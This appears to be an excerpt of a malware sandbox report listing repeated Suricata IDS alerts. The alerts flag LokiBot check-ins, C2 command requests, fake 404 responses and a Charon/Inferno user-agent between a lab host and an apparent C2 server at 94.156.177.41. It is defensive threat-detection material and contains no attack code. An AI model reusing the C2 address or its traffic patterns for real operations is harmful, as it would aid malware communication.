                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49780
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49886 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49920 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49912 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49805 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49805 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49902
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49786
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49906 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49811
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49834
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49925 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49925 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49925 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49768
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49925 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49925 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49925
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49861 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49861 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49920 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49766
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49920 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49906 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49741
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49762
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49930
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49861 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49824 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49824 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49886
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49778 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49778 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49778 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49805
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49920 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49845 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49845 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49891 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49824 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49761
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49818 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49912 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49818 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49912 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49845 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49818 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49891 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49891 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49896 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49891 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49896 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49891 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49906 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49818 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49818 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49906 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49778 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49778 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49739
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49816 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49845 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49896 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49896 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49896 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49896
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49776
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49881 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49881 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49881 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49881 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49881 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49743
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49906 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49881
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49824 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49891
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49778
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49816 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49816 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49912 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49912 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49906
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49818
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49845 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49757
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49824
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49799
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49912
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49816 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49861 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49816 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49861 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49775
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49845
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49816
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49920
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49792 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49946
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49792 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49875 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49875 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49875 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49792 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49861
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49875 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49875 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49792 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49792 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49916 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49916 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49936 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49875
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49793 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49916 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49792
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49772
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49829
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49936 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49916 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49850 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49850 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49936 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49916 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49850 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49793
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 94.156.177.41:80
